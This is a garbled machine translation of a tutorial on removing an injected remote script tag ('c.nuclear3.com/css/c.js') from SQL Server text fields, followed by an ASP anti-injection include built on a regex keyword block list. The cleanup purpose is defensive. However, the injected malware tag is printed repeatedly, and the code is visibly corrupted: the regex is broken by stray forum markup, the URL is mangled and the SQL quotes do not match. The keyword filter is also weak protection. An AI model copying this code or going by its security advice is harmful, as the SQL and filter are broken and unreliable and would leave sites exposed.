First back up the database in case of unnecessary loss. And then executes the varchar field with less than 8000 characters for all the horses being hanged.
Copy Code code as follows:
Update table name set field name =replace (field name, ' <script src=http://c.n%75clear3.com/css/c.js></script> ', ')
Where <script src=http://c.n%75clear3.com/css/c.js></script> is a horse-hanging field. The Mount horse field is cleared after execution. But there are some fields, such as content fields, which are more than 8000 characters varchar fields that need to be executed
Copy Code code as follows:
Update table name Set table entry =replace (CAST (table entry as varchar (8000)), ' <script src=http:/c.nuclear3.com/css/c.js> </Script> ' ,'')
To update the horse field, and the real estate network due to the content of more, the execution of the above statements will be suspended animation, so add an interval of two times, one treatment 15,000 to resolve.
Copy Code code as follows:
Update table name Set table entry =replace (CAST (table entry as varchar (8000)), ' <script src=http:/c.nuclear3.com/css/c.js> </Script> ' , ') where id>1 and id<15000
The above problems are generally SQL database, this is the SQL database specific injection vulnerabilities. Changing the database is not realistic, only for the above situation to prevent. The idea is to filter all the database link requests.
Copy Code code as follows:
<%
Response.Buffer = True ' Cache page
' Prevent get injection
If request.querystring <> "" Then stopinjection (Request.QueryString)
' Prevent post injection
If request.form <> "" Then stopinjection (Request.Form)
' Prevent cookies from being injected
If request.cookies <> "" Then stopinjection (Request.Cookies)
' Regular child function
Function stopinjection (Values)
Dim regEx
Set regEx = New RegExp
Regex.ignorecase = True
Regex.global = True
Regex.pattern = "' |;| #| ([\s\b+ ()]+ ([email=select%7cupdate%7cinsert%7cdelete%7cdeclare%7c@%7cexec%7cdbcc%7calter%7cdrop%7ccreate% 7cbackup%7cif%7celse%7cend%7cand%7cor%7cadd%7cset%7copen%7cclose%7cuse%7cbegin%7cretun%7cas%7cgo%7cexists) [/s/ b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open| close|use|begin|retun|as|go|exists) [\s\b[/email]+]*] "
Dim Sitem, svalue
For each sitem in Values
svalue = Values (Sitem)
If regex.test (svalue) Then
Response.Write "<script Language=javascript>alert (' illegally injected! Your actions have been recorded!! '); History.back ( -1);</script> "
Response.End
End If
Next
Set regEx = Nothing
End Function
%>
Do a generic SQL anti-injection page, include it in the Conn.asp database connection statement inside, so that the entire station to prevent SQL injection attacks. But the front desk is similar? Id= Such statements still have injection vulnerabilities, which require us to strictly filter what Request.Form and Request.QueryString get. Insist not to request ("name") such a way to get the value, usually use cookies saved content, try not to use in SQL statements query database operations.
If a friend who is unfamiliar with SQL Server can use software to implement
SQL Server database Bulk replacement tool (database and text file lookup replacement) v1.0 Chinese Green Edition
SQL Server database Bulk find substitution tool 1.2 sql Trojan Cleanup assistant